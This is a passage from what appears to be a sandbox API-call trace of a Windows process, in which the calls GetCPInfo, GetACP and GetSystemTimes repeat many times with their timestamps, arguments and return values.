CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.856] GetACP () returned 0x4e4 [0181.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.857] GetACP () returned 0x4e4 [0181.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.857] GetACP () returned 0x4e4 [0181.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.857] GetACP () returned 0x4e4 [0181.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.857] GetACP () returned 0x4e4 [0181.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.857] GetACP () returned 0x4e4 [0181.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.857] GetACP () returned 0x4e4 [0181.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.858] GetACP () returned 0x4e4 [0181.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.858] GetACP () returned 0x4e4 [0181.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.858] GetACP () returned 0x4e4 [0181.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.858] GetACP () returned 0x4e4 [0181.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.858] GetACP () returned 0x4e4 [0181.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.858] GetACP () returned 0x4e4 [0181.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.859] GetACP () returned 0x4e4 [0181.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.859] GetACP () returned 0x4e4 [0181.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.859] GetACP () returned 0x4e4 [0181.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.859] GetACP () returned 0x4e4 [0181.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.859] GetACP () returned 0x4e4 [0181.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.859] GetACP () returned 0x4e4 [0181.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.860] GetACP () returned 0x4e4 [0181.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.860] GetACP () returned 0x4e4 [0181.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.860] GetACP () returned 0x4e4 [0181.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.860] GetACP () returned 0x4e4 [0181.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.861] GetACP () returned 0x4e4 [0181.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.861] GetACP () returned 0x4e4 [0181.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.861] GetACP () returned 0x4e4 [0181.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.861] GetACP () returned 0x4e4 [0181.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.861] GetACP () returned 0x4e4 [0181.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.861] GetACP () returned 0x4e4 [0181.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.862] GetACP () returned 0x4e4 [0181.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.862] GetACP () returned 0x4e4 [0181.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.862] GetACP () returned 0x4e4 [0181.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.862] GetACP () returned 0x4e4 [0181.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.862] GetACP () returned 0x4e4 [0181.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.863] GetACP () returned 0x4e4 [0181.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.863] GetACP () returned 0x4e4 [0181.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.863] GetACP () returned 0x4e4 [0181.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.863] GetACP () returned 0x4e4 [0181.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.863] GetACP () returned 0x4e4 [0181.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.863] GetACP () returned 0x4e4 [0181.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.864] GetACP () returned 0x4e4 [0181.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.864] GetACP () returned 0x4e4 [0181.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.864] GetACP () returned 0x4e4 [0181.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.864] GetACP () returned 0x4e4 [0181.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.865] GetACP () returned 0x4e4 [0181.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.865] GetACP () returned 0x4e4 [0181.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.865] GetACP () returned 0x4e4 [0181.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.865] GetACP () returned 0x4e4 [0181.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.865] GetACP () returned 0x4e4 [0181.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.865] GetACP () returned 0x4e4 [0181.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.866] GetACP () returned 0x4e4 [0181.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.866] GetACP () returned 0x4e4 [0181.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.866] GetACP () returned 0x4e4 [0181.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.866] GetACP () returned 0x4e4 [0181.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.866] GetACP () returned 0x4e4 [0181.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.866] GetACP () returned 0x4e4 [0181.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.867] GetACP () returned 0x4e4 [0181.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.867] GetACP () returned 0x4e4 [0181.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.867] GetACP () returned 0x4e4 [0181.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.867] GetACP () returned 0x4e4 [0181.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.867] GetACP () returned 0x4e4 [0181.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.867] GetACP () returned 0x4e4 [0181.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.868] GetACP () returned 0x4e4 [0181.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.868] GetACP () returned 0x4e4 [0181.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.868] GetACP () returned 0x4e4 [0181.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.868] GetACP () returned 0x4e4 [0181.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.868] GetACP () returned 0x4e4 [0181.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.868] GetACP () returned 0x4e4 [0181.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.869] GetACP () returned 0x4e4 [0181.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.869] GetACP () returned 0x4e4 [0181.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.869] GetACP () returned 0x4e4 [0181.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.869] GetACP () returned 0x4e4 [0181.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.869] GetACP () returned 0x4e4 [0181.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.869] GetACP () returned 0x4e4 [0181.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.869] GetACP () returned 0x4e4 [0181.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.870] GetACP () returned 0x4e4 [0181.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.870] GetACP () returned 0x4e4 [0181.870] GetSystemTimes (in: lpIdleTime=0x18fa70, 